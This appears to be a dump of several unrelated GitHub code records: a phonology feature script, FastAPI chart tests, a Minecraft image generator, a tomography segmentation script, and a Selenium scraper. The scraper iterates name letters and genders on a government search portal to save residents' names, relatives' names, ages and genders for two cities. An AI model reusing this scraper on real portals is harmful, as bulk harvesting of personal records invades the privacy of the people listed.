Basic usage: \\n\\n$ python3 pynatclasses.py /home/full/path/to/file/Features.txt /home/full/path/to/output.txt\\n\\n You can also get all the consonants from a feature file from a command line call: \\n $ python3 pynatclasses.py /home/full/path/to/Features.txt cons\\n\\n This last option requires there being a -syll or -syllabic feature in the file.\\n\\n\\n To see other options, import it into python and try help(pynatclasses)'\n\tCLError = '\\n\\nPlease provide the name of a feature file and a place to save the natural classes to. \\n\\nFor example: \"python3 pynatclasses.py /home/you/Desktop/features.txt /home/you/Desktop/natclasses.txt\"\\n\\n'\n\tbasepath = os.path.dirname(os.path.dirname(os.getcwd()))\n\tif \"--help\" in sys.argv:\n\t\tmsg.env_render(message=HelpString)\n\telif '--check' in sys.argv:\n\t\tfeats = os.path.join(basepath, 'data', sys.argv[1], 'Features.txt')\n\t\tfeatlines = read_feat_file(feats)\n\t\tcheck_feats(featlines)\n\telif '--cus' in sys.argv:\n\t\tfeats = os.path.join(basepath, 'data', sys.argv[1], 'Features.txt')\n\t\tmake_custom_proj(sys.argv[2], feats, '/home/maria/Desktop/projections.txt')\n\telif not \"--cons\" in sys.argv:\n\t\ttry: \n\t\t\tfeats = sys.argv[1]\n\t\t\toutfile = sys.argv[2]\n\t\t\toutwrite_classes(feats, outfile)\n\t\texcept IndexError:\n\t\t\tmsg.env_render(message=CLError)\n\telse:\n\t\ttry:\n\t\t\tget_consonants(sys.argv[1])\n\t\texcept IndexError:\n\t\t\tmsg.env_render(message=\"Please provide a full path to the feature file, like this: \\n $ python3 pynatclasses.py /home/full/path/to/features.txt cons\")\n\n", "repo_name": "gouskova/compsegcode", "sub_path": "code/pynatclasses.py", "file_name": "pynatclasses.py", "file_ext": "py", "file_size_in_byte": 14151, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 1, "dataset": "github-code", "pt": "41", "api": [{"api_name": "messages.env_render", "line_number": 47, "usage_type": "call"}, {"api_name": "messages.env_render", "line_number": 65, "usage_type": "call"}, {"api_name": "itertools.combinations", "line_number": 106, "usage_type": "call"}, {"api_name": "messages.env_render", "line_number": 111, "usage_type": "call"}, {"api_name": "messages.env_render", "line_number": 115, "usage_type": "call"}, {"api_name": "messages.env_render", "line_number": 118, "usage_type": "call"}, {"api_name": "messages.env_render", "line_number": 149, "usage_type": "call"}, {"api_name": "itertools.chain.from_iterable", "line_number": 179, "usage_type": "call"}, {"api_name": "itertools.chain", "line_number": 179, "usage_type": "attribute"}, {"api_name": "itertools.combinations", "line_number": 179, "usage_type": "call"}, {"api_name": "messages.env_render", "line_number": 259, "usage_type": "call"}, {"api_name": "messages.env_render", "line_number": 272, "usage_type": "call"}, {"api_name": "messages.env_render", "line_number": 287, "usage_type": "call"}, {"api_name": "os.path.isfile", "line_number": 296, "usage_type": "call"}, {"api_name": "os.path", "line_number": 296, "usage_type": "attribute"}, {"api_name": "messages.env_render", "line_number": 330, "usage_type": "call"}, {"api_name": "os.path.dirname", "line_number": 343, "usage_type": "call"}, {"api_name": "os.path", "line_number": 343, "usage_type": "attribute"}, {"api_name": "os.getcwd", "line_number": 343, "usage_type": "call"}, {"api_name": "sys.argv", "line_number": 344, "usage_type": "attribute"}, {"api_name": "messages.env_render", "line_number": 345, "usage_type": "call"}, {"api_name": "sys.argv", "line_number": 346, 
"usage_type": "attribute"}, {"api_name": "os.path.join", "line_number": 347, "usage_type": "call"}, {"api_name": "os.path", "line_number": 347, "usage_type": "attribute"}, {"api_name": "sys.argv", "line_number": 347, "usage_type": "attribute"}, {"api_name": "sys.argv", "line_number": 350, "usage_type": "attribute"}, {"api_name": "os.path.join", "line_number": 351, "usage_type": "call"}, {"api_name": "os.path", "line_number": 351, "usage_type": "attribute"}, {"api_name": "sys.argv", "line_number": 351, "usage_type": "attribute"}, {"api_name": "sys.argv", "line_number": 352, "usage_type": "attribute"}, {"api_name": "sys.argv", "line_number": 353, "usage_type": "attribute"}, {"api_name": "sys.argv", "line_number": 355, "usage_type": "attribute"}, {"api_name": "sys.argv", "line_number": 356, "usage_type": "attribute"}, {"api_name": "messages.env_render", "line_number": 359, "usage_type": "call"}, {"api_name": "sys.argv", "line_number": 362, "usage_type": "attribute"}, {"api_name": "messages.env_render", "line_number": 364, "usage_type": "call"}]} +{"seq_id": "10695710043", "text": "import sys\nimport pytest\nfrom os.path import exists\nfrom fastapi import FastAPI\nfrom httpx import AsyncClient\nfrom sqlalchemy.orm import Session\nfrom sqlalchemy.sql import text\nfrom AkvoResponseGrouper.cli.generate_schema import generate_schema\nfrom AkvoResponseGrouper.views import (\n get_categories,\n refresh_view,\n)\nfrom models.question import Question, QuestionType\n\nfrom source.main import INSTANCE_NAME\n\npytestmark = pytest.mark.asyncio\nsys.path.append(\"..\")\n\n\nclass TestMigrationCategoryAndNationalData:\n @pytest.mark.asyncio\n async def test_if_views_is_successfully_added(\n self, app: FastAPI, session: Session, client: AsyncClient\n ) -> None:\n schema = generate_schema(\n file_config=f\"./source/{INSTANCE_NAME}/category.json\"\n )\n session.execute(text(schema))\n # check if .category.json was created\n assert exists(\"./.category.json\") is True\n # REFRESH VIEW\n refresh_view(session=session)\n res = get_categories(session=session)\n assert len(res) > 1\n\n @pytest.mark.asyncio\n async def test_get_number_of_school(\n self, app: FastAPI, session: Session, client: AsyncClient\n ):\n res = await client.get(\n app.url_path_for(\"charts:get_number_of_school\"),\n )\n assert res.status_code == 200\n res = res.json()\n assert list(res) == [\"name\", \"total\"]\n\n @pytest.mark.asyncio\n async def test_get_bar_charts_route(\n self, app: FastAPI, session: Session, client: AsyncClient\n ):\n res = await client.get(\n app.url_path_for(\"charts:get_bar_charts\"),\n )\n assert res.status_code == 200\n res = res.json()\n assert list(res[0]) == [\n 'category', 'form', 'options'\n ]\n assert list(res[0][\"options\"][0]) == [\n 'name', 'order', 'color', 'count'\n ]\n # TODO:: Delete\n # assert res == [{\n # 'category': 'Hygiene',\n # 'form': 647170919,\n # 'options': [{\n # 'name': 'Basic',\n # 'color': '#51B453',\n # 'order': 1,\n # 'count': 1\n # }, {\n # 'name': 'Limited',\n # 'color': '#fff176',\n # 'order': 2,\n # 'count': 0\n # }, {\n # 'name': 'No Service',\n # 'color': '#FEBC11',\n # 'order': 3,\n # 'count': 0\n # }]\n # }, {\n # 'category': 'Sanitation',\n # 'form': 647170919,\n # 'options': [{\n # 'name': 'Basic',\n # 'color': '#ab47bc',\n # 'order': 1,\n # 'count': 0\n # }, {\n # 'name': 'Limited',\n # 'color': '#fff176',\n # 'order': 2,\n # 'count': 1\n # }, {\n # 'name': 'No Service',\n # 'color': '#FEBC11',\n # 'order': 3,\n # 'count': 0\n # }]\n # }, {\n # 'category': 'Water',\n # 'form': 
647170919,\n # 'options': [{\n # 'name': 'Safely Managed',\n # 'color': '#0080c6',\n # 'order': 1,\n # 'count': 0\n # }, {\n # 'name': 'Basic',\n # 'color': '#00b8ec',\n # 'order': 2,\n # 'count': 0\n # }, {\n # 'name': 'Limited',\n # 'color': '#fff176',\n # 'order': 3,\n # 'count': 1\n # }, {\n # 'name': 'No Service',\n # 'color': '#FEBC11',\n # 'order': 4,\n # 'count': 0\n # }]\n # }]\n\n @pytest.mark.asyncio\n async def test_get_bar_charts_filter_by_name_route(\n self, app: FastAPI, session: Session, client: AsyncClient\n ):\n api_url = app.url_path_for(\"charts:get_bar_charts\")\n res = await client.get(f\"{api_url}?name=Water\")\n assert res.status_code == 200\n res = res.json()\n assert list(res[0]) == [\n 'category', 'form', 'options'\n ]\n assert res[0][\"category\"] == \"Water\"\n assert list(res[0][\"options\"][0]) == [\n 'name', 'order', 'color', 'count'\n ]\n for opt in res[0][\"options\"]:\n assert opt[\"name\"] in [\n 'Safely Managed', 'Basic',\n 'Limited', 'No Service'\n ]\n assert opt[\"color\"] in [\n '#0080c6', '#00b8ec',\n '#fff176', '#FEBC11'\n ]\n # TODO:: Delete\n # assert res == [{\n # 'category': 'Water',\n # 'form': 647170919,\n # 'options': [{\n # 'name': 'Safely Managed',\n # 'color': '#0080c6',\n # 'order': 1,\n # 'count': 0\n # }, {\n # 'name': 'Basic',\n # 'color': '#00b8ec',\n # 'order': 2,\n # 'count': 0\n # }, {\n # 'name': 'Limited',\n # 'color': '#fff176',\n # 'order': 3,\n # 'count': 1\n # }, {\n # 'name': 'No Service',\n # 'color': '#FEBC11',\n # 'order': 4,\n # 'count': 0\n # }]\n # }]\n\n @pytest.mark.asyncio\n async def test_get_national_data_by_question(\n self, app: FastAPI, session: Session, client: AsyncClient\n ):\n questions = session.query(Question)\n question_text = questions.filter(\n Question.type == QuestionType.text).first()\n question_number = questions.filter(\n Question.type == QuestionType.number).first()\n question_option = questions.filter(\n Question.type == QuestionType.option).first()\n # question not found\n res = await client.get(\n app.url_path_for(\n \"charts:get_national_charts_by_question\",\n question=12345\n )\n )\n assert res.status_code == 404\n # not number, multiple, option question\n res = await client.get(\n app.url_path_for(\n \"charts:get_national_charts_by_question\",\n question=question_text.id\n )\n )\n assert res.status_code == 404\n # number question\n res = await client.get(\n app.url_path_for(\n \"charts:get_national_charts_by_question\",\n question=question_number.id\n )\n )\n assert res.status_code == 200\n res = res.json()\n assert list(res) == ['name', 'total', 'count']\n # option question\n res = await client.get(\n app.url_path_for(\n \"charts:get_national_charts_by_question\",\n question=question_option.id\n )\n )\n assert res.status_code == 200\n res = res.json()\n assert list(res) == ['name', 'option']\n assert list(res['option'][0]) == [\n 'name', 'order', 'color', 'description', 'count'\n ]\n", "repo_name": "akvo/siwins", "sub_path": "backend/tests/test_090_category_and_national_data.py", "file_name": "test_090_category_and_national_data.py", "file_ext": "py", "file_size_in_byte": 7237, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 0, "dataset": "github-code", "pt": "41", "api": [{"api_name": "pytest.mark", "line_number": 17, "usage_type": "attribute"}, {"api_name": "sys.path.append", "line_number": 18, "usage_type": "call"}, {"api_name": "sys.path", "line_number": 18, "usage_type": "attribute"}, {"api_name": "fastapi.FastAPI", "line_number": 24, "usage_type": "name"}, 
{"api_name": "sqlalchemy.orm.Session", "line_number": 24, "usage_type": "name"}, {"api_name": "httpx.AsyncClient", "line_number": 24, "usage_type": "name"}, {"api_name": "AkvoResponseGrouper.cli.generate_schema.generate_schema", "line_number": 26, "usage_type": "call"}, {"api_name": "source.main.INSTANCE_NAME", "line_number": 27, "usage_type": "name"}, {"api_name": "sqlalchemy.sql.text", "line_number": 29, "usage_type": "call"}, {"api_name": "os.path.exists", "line_number": 31, "usage_type": "call"}, {"api_name": "AkvoResponseGrouper.views.refresh_view", "line_number": 33, "usage_type": "call"}, {"api_name": "AkvoResponseGrouper.views.get_categories", "line_number": 34, "usage_type": "call"}, {"api_name": "pytest.mark", "line_number": 22, "usage_type": "attribute"}, {"api_name": "fastapi.FastAPI", "line_number": 39, "usage_type": "name"}, {"api_name": "sqlalchemy.orm.Session", "line_number": 39, "usage_type": "name"}, {"api_name": "httpx.AsyncClient", "line_number": 39, "usage_type": "name"}, {"api_name": "pytest.mark", "line_number": 37, "usage_type": "attribute"}, {"api_name": "fastapi.FastAPI", "line_number": 50, "usage_type": "name"}, {"api_name": "sqlalchemy.orm.Session", "line_number": 50, "usage_type": "name"}, {"api_name": "httpx.AsyncClient", "line_number": 50, "usage_type": "name"}, {"api_name": "pytest.mark", "line_number": 48, "usage_type": "attribute"}, {"api_name": "fastapi.FastAPI", "line_number": 130, "usage_type": "name"}, {"api_name": "sqlalchemy.orm.Session", "line_number": 130, "usage_type": "name"}, {"api_name": "httpx.AsyncClient", "line_number": 130, "usage_type": "name"}, {"api_name": "pytest.mark", "line_number": 128, "usage_type": "attribute"}, {"api_name": "fastapi.FastAPI", "line_number": 181, "usage_type": "name"}, {"api_name": "sqlalchemy.orm.Session", "line_number": 181, "usage_type": "name"}, {"api_name": "httpx.AsyncClient", "line_number": 181, "usage_type": "name"}, {"api_name": "models.question.Question", "line_number": 183, "usage_type": "argument"}, {"api_name": "models.question.Question.type", "line_number": 185, "usage_type": "attribute"}, {"api_name": "models.question.Question", "line_number": 185, "usage_type": "name"}, {"api_name": "models.question.QuestionType.text", "line_number": 185, "usage_type": "attribute"}, {"api_name": "models.question.QuestionType", "line_number": 185, "usage_type": "name"}, {"api_name": "models.question.Question.type", "line_number": 187, "usage_type": "attribute"}, {"api_name": "models.question.Question", "line_number": 187, "usage_type": "name"}, {"api_name": "models.question.QuestionType.number", "line_number": 187, "usage_type": "attribute"}, {"api_name": "models.question.QuestionType", "line_number": 187, "usage_type": "name"}, {"api_name": "models.question.Question.type", "line_number": 189, "usage_type": "attribute"}, {"api_name": "models.question.Question", "line_number": 189, "usage_type": "name"}, {"api_name": "models.question.QuestionType.option", "line_number": 189, "usage_type": "attribute"}, {"api_name": "models.question.QuestionType", "line_number": 189, "usage_type": "name"}, {"api_name": "pytest.mark", "line_number": 179, "usage_type": "attribute"}]} +{"seq_id": "3661359863", "text": "import datetime\nfrom PIL import Image, ImageDraw, ImageFont\n\ndef get_text_dimensions(text_string, font):\n # https://stackoverflow.com/a/46220683/9263761\n ascent, descent = font.getmetrics()\n\n text_width = font.getmask(text_string).getbbox()[2]\n text_height = font.getmask(text_string).getbbox()[3] + descent\n\n 
return (text_width, text_height)\n\ndef generate_image(collection, rank):\n    \"\"\"\n    Generates an image displaying the amount of collected\n    redstone and the leaderboard rank of the player.\n    \"\"\"\n\n    # Setup\n    image = Image.new(mode = \"RGB\", size=(1200,160), color=\"black\")\n    draw = ImageDraw.Draw(image)\n\n    # Fonts\n    font_lg = ImageFont.truetype('minecraft.ttf', 56)\n    font_sm = ImageFont.truetype('minecraft.ttf', 28)\n\n    # Text segments\n    segments = [\n        (\"Redstone:\", \"#aaaaaa\", \"#555555\"),\n        (\"_\", \"#000000\", \"#000000\"),\n        (format(collection, \",\"), \"#55ff55\", \"#005500\"),\n        (\"_\", \"#000000\", \"#000000\"),\n        (\"(\", \"#aaaaaa\", \"#555555\"),\n        (f\"# {rank}\", \"#55ffff\", \"#005555\"),\n        (\")\", \"#aaaaaa\", \"#555555\"),\n    ]\n\n    # Draw each segment of text\n    x = 28\n    margin = 8\n    offset = 7\n    for text, color, dark_color in segments:\n        draw.text((x + offset, 28 + offset), text, fill=dark_color, font=font_lg)\n        draw.text((x, 28), text, fill=color, font=font_lg)\n        w, h = get_text_dimensions(text, font=font_lg)\n        x = x + w + margin\n\n    # Draw the current time, formatted\n    lastupdated = datetime.datetime.now(datetime.timezone(datetime.timedelta(hours=-4))).strftime(\"%B %d, %Y, %I:%M:%S %p EDT\").replace(\"  \", \" \")\n    draw.text((28, 108), f\"Last Updated: {lastupdated}\", fill=\"#aaaaaa\", font=font_sm)\n\n    return image\n", "repo_name": "SoshJam/redstone-collection-signature", "sub_path": "imagegen.py", "file_name": "imagegen.py", "file_ext": "py", "file_size_in_byte": 1733, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 0, "dataset": "github-code", "pt": "41", "api": [{"api_name": "PIL.Image.new", "line_number": 20, "usage_type": "call"}, {"api_name": "PIL.Image", "line_number": 20, "usage_type": "name"}, {"api_name": "PIL.ImageDraw.Draw", "line_number": 21, "usage_type": "call"}, {"api_name": "PIL.ImageDraw", "line_number": 21, "usage_type": "name"}, {"api_name": "PIL.ImageFont.truetype", "line_number": 24, "usage_type": "call"}, {"api_name": "PIL.ImageFont", "line_number": 24, "usage_type": "name"}, {"api_name": "PIL.ImageFont.truetype", "line_number": 25, "usage_type": "call"}, {"api_name": "PIL.ImageFont", "line_number": 25, "usage_type": "name"}, {"api_name": "datetime.datetime.now", "line_number": 49, "usage_type": "call"}, {"api_name": "datetime.datetime", "line_number": 49, "usage_type": "attribute"}, {"api_name": "datetime.timezone", "line_number": 49, "usage_type": "call"}, {"api_name": "datetime.timedelta", "line_number": 49, "usage_type": "call"}]} +{"seq_id": "36550411017", "text": "from bs4 import BeautifulSoup\nfrom selenium import webdriver\nfrom selenium.webdriver.common.keys import Keys\nimport re\nimport time\nimport simplejson as json\nimport json\nimport getpass\nfrom selenium.common.exceptions import NoSuchElementException\nimport numpy as np\nimport collections\nfrom collections import OrderedDict\nimport string\nimport io\n##################################################################\n\ndef Get_Data(base_url,city,username,gender,value):\t\t# Extracts table data\n\tdriver=webdriver.PhantomJS()\n\tdriver.get(base_url)\n\tdriver.find_element_by_xpath(\"//select[@id='ddlDistricts']//option[@value='\"+city+\"']\").click()\n\ttime.sleep(2)\n\tdriver.find_element_by_id('RdlSearchBy_1')\n\tdriver.find_element_by_xpath(\"//input[@id='RdlSearchBy_1']\").click()\n\tname=driver.find_element_by_id('txtFirstName')\n\t#username=input(\"Enter the name character:\\n\")\n\tfor char in username:\n\t\tname.send_keys(char)\n\n\tdriver.find_element_by_xpath(\"//select[@id='ddlGender']//option[@value='\"+gender+\"']\").click()\n\tdriver.find_element_by_id('Button1').click()\n\ttime.sleep(1)\n\t
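# Assumption about the page: results render into table 'gvSearchResult'; the header row's th cells carry the column names read below.\n\t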
elements=driver.find_elements_by_xpath(\"//table[@id='gvSearchResult']/tbody/tr/th\")\n\tColumn_Names=[]\n\tfor elm in elements:\n\t\tColumn_Names.append(elm.text)\n\tColumn_Names=Column_Names[5:11]\n\tList=[]\n\tLink_List=[]\n\t\n\tRecord={}\n\tlinks=driver.find_elements_by_xpath(\"//table[@id='gvSearchResult']/tbody/tr/td//table/tbody/tr/td/a\")\n\tfor link in links:\n\t\tLink_List.append(link.get_attribute('href'))\n\t\n\telements=driver.find_elements_by_xpath(\"//table[@id='gvSearchResult']/tbody/tr\")\n\tfor elm in elements:\n\t\tList.append(elm.find_elements_by_tag_name(\"td\")[5:11])\n\tfor i in List:\n\t\tfor j in i:\n\t\t\tvalue.append(j.text)\n\tdriver.close()\n\n\ndef Crawl_City(city):\t\t# records the data in suitable format by transforming and saving in JSON format\n\tpath=\"/home/subir_sbr/Desktop/\" ## set the local path\n\tchar=list(string.ascii_lowercase)\n\tgender=['M','F','O']\t\t# Gender O stands for TransGender\n\tvalue=[]\n\tbase_url=\"http://164.100.180.82/searchengine/SearchEngineEnglish.aspx\"\n\n\tfor g in gender:\n\t\tfor c in char:\n\t\t\tprint(\"Extracting Details for name with char %s of gender %s\"% (c,g))\n\t\t\tGet_Data(base_url,city,c,g,value)\t# getting data for different gender and name character\n\t\t\tprint(len(value))\n\n\tColumn_Names=['First Name', 'Name (Hindi)', \"Father/Husband's Name\", \"Father/Husband's Name (Hindi)\", 'Age', 'Gender']\t\n\tmyarray=np.asarray(value)\n\tm=len(myarray)\n\tn=len(Column_Names)\n\tmyarray.resize(m//n, n)\n\tdetails = myarray.tolist()\n\tCompleteDict={}\n\tRecord={}\n\tfinalDict={}\n\tCompleteDict=collections.OrderedDict(CompleteDict)\n\tRecord=collections.OrderedDict(Record)\n \n\tfor i in range(len(details)):\n\t\tfor j in range(len(Column_Names)):\n\t\t\tRecord[Column_Names[j]]=details[i][j]\n\t\tCompleteDict[i]=dict(Record)\t# final dictionary having all the data\n\n\twith open(\"/home/subir_sbr/Desktop/\"+city+\".json\", \"w\",encoding='utf8') as writeJSON: \t#path of\n\t\tjson.dump(CompleteDict,writeJSON,ensure_ascii=False,sort_keys=True, indent=4)\n\n\nif __name__ == '__main__':\n\n\tCrawl_City(\"08\")\t# for agra\n\tCrawl_City(\"09\")\t# for aligarh\n\n \n ", "repo_name": "99sbr/Scraping", "sub_path": "Public-Portal-Data-Extraction/task.py", "file_name": "task.py", "file_ext": "py", "file_size_in_byte": 3086, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 0, "dataset": "github-code", "pt": "41", "api": [{"api_name": "selenium.webdriver.PhantomJS", "line_number": 18, "usage_type": "call"}, {"api_name": "selenium.webdriver", "line_number": 18, "usage_type": "name"}, {"api_name": "time.sleep", "line_number": 21, "usage_type": "call"}, {"api_name": "time.sleep", "line_number": 31, "usage_type": "call"}, {"api_name": "string.ascii_lowercase", "line_number": 56, "usage_type": "attribute"}, {"api_name": "numpy.asarray", "line_number": 68, "usage_type": "call"}, {"api_name": "collections.OrderedDict", "line_number": 76, "usage_type": "call"}, {"api_name": "collections.OrderedDict", "line_number": 77, "usage_type": "call"}, {"api_name": "json.dump", "line_number": 85, "usage_type": "call"}]} +{"seq_id": "70203226684", "text": "\"\"\"\n\n    Add segmentation labels to GraphMCF objects in a STAR file which pairs them with the segmentation\n\n    Input: - The STAR file\n\n    Output: - New graphs are pickled 
with the segmentation information\n\n\"\"\"\n\n__author__ = 'Antonio Martinez-Sanchez'\n\n# ################ Package import\n\nimport time\nimport pyseg as ps\nimport scipy as sp\nimport os\nimport sys\nimport numpy as np\ntry:\n import pickle as pickle\nexcept:\n import pickle\n\n########## Global variables\n\n########################################################################################\n# PARAMETERS\n########################################################################################\n\n####### Input data\n\nROOT_PATH = '/fs/pool/pool-lucic2'\n\n# Input STAR file with segmentations\nin_star = ROOT_PATH + '/antonio/workspace/psd_an/in/syn_seg_ves_glur_graph.star'\nin_g_star = ROOT_PATH + '/antonio/workspace/psd_an/in/syn_seg_glur.star'\n\n####### Output data\n\nout_dir = ROOT_PATH+'/ex/syn/graphs_ves'\nout_sufix = 'ves'\n\n####### Graph settings\n\ngh_pname = 'syn_seg'\ngh_clean = False\n\n####### Segmentation pre-processing\n\nsg_th = 8 # > is considered fg, if None segmentation labels are considered\nsg_lbl = 6 # label for be set on the graph, only applicable if sg_th is not None\nsg_ref = True # if True then segmentation is done in 'rlnMircographName' tomogram space, False for 'psSegImage' space\nsg_close = 1\n\n########################################################################################\n# MAIN ROUTINE\n########################################################################################\n\n# Print initial message\nprint('Adding segmentation to GraphMCF objects.')\nprint('\\tAuthor: ' + __author__)\nprint('\\tDate: ' + time.strftime(\"%c\") + '\\n')\nprint('Options:')\n# print '\\tDisPerSe persistence threshold (nsig): ' + str(nsig)\nprint('\\tSTAR file with the GraphMCF and segmentation pairs: ' + in_star)\nprint('\\tSTAR file with the GraphMCF info: ' + in_g_star)\nprint('\\tOutput directory: ' + out_dir)\nprint('\\t\\t-Files sufix: ' + out_sufix)\nprint('\\tGraph settings: ')\nprint('\\t\\t-Property name: ' + gh_pname)\nif gh_clean:\n print('\\t\\t-Clean old values for the selected property.')\nprint('\\tSegmentation processing: ')\nif sg_th is None:\n print('\\t\\t-Using segmentation labels.')\nelse:\n print('\\t\\t-Segmentation threshold: ' + str(sg_th))\n print('\\t\\t-Segmentation label: ' + str(sg_lbl))\nif sg_ref:\n print('\\t\\t-Reference space \\'rlnMicrographName\\'')\nelse:\n print('\\t\\t-Reference space \\'psSegImage\\'')\nprint('\\t\\t-Iterations for post closing: ' + str(sg_close))\nprint('')\n\nprint('Loading the input star file...')\nstar, graph_star = ps.sub.Star(), ps.sub.Star()\nstar.load(in_star)\ngraph_star.load(in_g_star)\nif not star.has_column('_psGhMCFPickle'):\n print('ERROR: input pairs STAR file has no \\'psGhMCFPickle\\' column.')\n print('Un-successfully terminated. (' + time.strftime(\"%c\") + ')')\n sys.exit(-1)\nif not star.has_column('_psSegImage'):\n print('ERROR: input pairs STAR file has no \\'psSegImage\\' column.')\n print('Un-successfully terminated. (' + time.strftime(\"%c\") + ')')\n sys.exit(-1)\nif not graph_star.has_column('_rlnMicrographName'):\n print('ERROR: input graph STAR file has no \\'rlnMicrographName\\' column.')\n print('Un-successfully terminated. (' + time.strftime(\"%c\") + ')')\n sys.exit(-1)\nif not graph_star.has_column('_psGhMCFPickle'):\n print('ERROR: input graph STAR file has no \\'psGhMCFPickle\\' column.')\n print('Un-successfully terminated. 
(' + time.strftime(\"%c\") + ')')\n sys.exit(-1)\ngraph_list = graph_star.get_column_data('_psGhMCFPickle')\n\n# Loop for processing the input data\nprint('Running main loop: ')\nfor row in range(star.get_nrows()):\n\n seg_file, graph_file = star.get_element('_psSegImage', row), star.get_element('_psGhMCFPickle', row)\n print('\\tPre-processing segmentation tomogram: ' + seg_file)\n mic_file = graph_star.get_element('_rlnMicrographName', row)\n try:\n seg = ps.disperse_io.load_tomo(seg_file).astype(np.uint16)\n except IOError:\n print('WARNING: input tomograms ' + seg_file + ' could not be read!')\n continue\n try:\n mic = ps.disperse_io.load_tomo(mic_file, mmap=True)\n except IOError:\n print('WARNING: input tomograms ' + mic_file + ' could not be read!')\n continue\n\n try:\n segg_row = graph_list.index(graph_file)\n except ValueError:\n print('WARNING: graph ' + graph_file + ' where not found on graphs STAR file!')\n continue\n segg_fname = graph_star.get_element('_psSegImage', segg_row)\n\n if sg_ref:\n print('\\tApplying rigid body transformation to fit segmentation...')\n if sg_th is None:\n p_ids = (np.arange(seg.shape[0]), np.arange(seg.shape[1]), np.arange(seg.shape[2]))\n else:\n p_ids = np.where(seg > sg_th)\n segg = ps.disperse_io.load_tomo(segg_fname)\n if os.path.splitext(segg_fname)[1] == '.fits':\n segg = segg.swapaxes(0, 1)\n seg = np.zeros(shape=segg.shape, dtype=np.uint16)\n mic_c = np.asarray((.5*mic.shape[0], .5*mic.shape[1], .5*mic.shape[2]), dtype=float)\n for i in range(len(p_ids[0])):\n point = np.asarray((p_ids[0][i], p_ids[1][i], p_ids[2][i]), dtype=float)\n # Segmentation rigid body transformations\n # Centering\n point -= mic_c\n # Rotation\n try:\n rot, tilt, psi = graph_star.get_element('_psSegRot', segg_row), \\\n graph_star.get_element('_psSegTilt', segg_row), \\\n graph_star.get_element('_psSegPsi', segg_row)\n M = ps.globals.rot_mat_relion(rot, tilt, psi, deg=True)\n hold = (M * point.reshape(3, 1)).reshape(3)[0]\n point[0], point[1], point[2] = hold[0, 0], hold[0, 1], hold[0, 2]\n except KeyError:\n pass\n # Un-centering\n point += mic_c\n # Cropping\n try:\n offy, offx, offz = graph_star.get_element('_psSegOffX', segg_row), \\\n graph_star.get_element('_psSegOffY', segg_row), \\\n graph_star.get_element('_psSegOffZ', segg_row)\n point -= np.asarray((offx, offy, offz), dtype=float)\n except KeyError:\n pass\n # Assign the label\n x, y, z = int(round(point[0])), int(round(point[1])), int(round(point[2]))\n if (x >= 0) and (x < seg.shape[0]) and (y >= 0) and (y < seg.shape[1]) and (z >= 0) and (z < seg.shape[2]):\n seg[x, y, z] = sg_lbl\n if sg_close > 0:\n print('\\t\\t-Closing...')\n hold_seg = sp.ndimage.morphology.binary_closing(seg==sg_lbl, structure=None, iterations=sg_close)\n seg = np.zeros(shape=hold_seg.shape, dtype=np.uint16)\n seg[hold_seg > 0] = sg_lbl\n if os.path.splitext(segg_fname)[1] == '.fits':\n seg = seg.swapaxes(0, 1)\n in_seg_file = os.path.splitext(os.path.split(seg_file)[1])[0]\n out_seg_file = out_dir + '/' + in_seg_file + '_' + out_sufix + '_seg.vti'\n print('\\t\\t-Storing transformed segmentation in: ' + out_seg_file)\n ps.disperse_io.save_numpy(seg, out_seg_file)\n\n print('\\tLoading the graph...')\n graph = ps.factory.unpickle_obj(graph_file)\n\n print('\\tAdding segmentation to graph...')\n graph.add_scalar_field_nn(seg, name=gh_pname, clean=gh_clean, bg=0)\n\n in_graph_stem = os.path.splitext(os.path.split(graph_file)[1])[0]\n out_graph_file = out_dir + '/' + in_graph_stem + '_' + out_sufix + '.pkl'\n print('\\tPickling 
updated graph in: ' + out_graph_file)\n graph.pickle(out_graph_file)\n graph_star.set_element('_psGhMCFPickle', segg_row, out_graph_file)\n ps.disperse_io.save_vtp(graph.get_vtp(av_mode=True, edges=True),\n out_dir + '/' + in_graph_stem + '_' + out_sufix + '_edges.vtp')\n\nin_star_stem = os.path.splitext(os.path.split(in_star)[1])[0]\nout_star = out_dir + '/' + in_star_stem + '_' + out_sufix + '.star'\nprint('\\tStoring output STAR file in: ' + out_star)\ngraph_star.store(out_star)\n\nprint('Terminated. (' + time.strftime(\"%c\") + ')')", "repo_name": "anmartinezs/pyseg_system", "sub_path": "code/pyseg/psd/seg_to_graph.py", "file_name": "seg_to_graph.py", "file_ext": "py", "file_size_in_byte": 8240, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 18, "dataset": "github-code", "pt": "41", "api": [{"api_name": "time.strftime", "line_number": 64, "usage_type": "call"}, {"api_name": "pyseg.sub.Star", "line_number": 89, "usage_type": "call"}, {"api_name": "pyseg.sub", "line_number": 89, "usage_type": "attribute"}, {"api_name": "time.strftime", "line_number": 94, "usage_type": "call"}, {"api_name": "sys.exit", "line_number": 95, "usage_type": "call"}, {"api_name": "time.strftime", "line_number": 98, "usage_type": "call"}, {"api_name": "sys.exit", "line_number": 99, "usage_type": "call"}, {"api_name": "time.strftime", "line_number": 102, "usage_type": "call"}, {"api_name": "sys.exit", "line_number": 103, "usage_type": "call"}, {"api_name": "time.strftime", "line_number": 106, "usage_type": "call"}, {"api_name": "sys.exit", "line_number": 107, "usage_type": "call"}, {"api_name": "pyseg.disperse_io.load_tomo", "line_number": 118, "usage_type": "call"}, {"api_name": "pyseg.disperse_io", "line_number": 118, "usage_type": "attribute"}, {"api_name": "numpy.uint16", "line_number": 118, "usage_type": "attribute"}, {"api_name": "pyseg.disperse_io.load_tomo", "line_number": 123, "usage_type": "call"}, {"api_name": "pyseg.disperse_io", "line_number": 123, "usage_type": "attribute"}, {"api_name": "numpy.arange", "line_number": 138, "usage_type": "call"}, {"api_name": "numpy.where", "line_number": 140, "usage_type": "call"}, {"api_name": "pyseg.disperse_io.load_tomo", "line_number": 141, "usage_type": "call"}, {"api_name": "pyseg.disperse_io", "line_number": 141, "usage_type": "attribute"}, {"api_name": "os.path.splitext", "line_number": 142, "usage_type": "call"}, {"api_name": "os.path", "line_number": 142, "usage_type": "attribute"}, {"api_name": "numpy.zeros", "line_number": 144, "usage_type": "call"}, {"api_name": "numpy.uint16", "line_number": 144, "usage_type": "attribute"}, {"api_name": "numpy.asarray", "line_number": 145, "usage_type": "call"}, {"api_name": "numpy.asarray", "line_number": 147, "usage_type": "call"}, {"api_name": 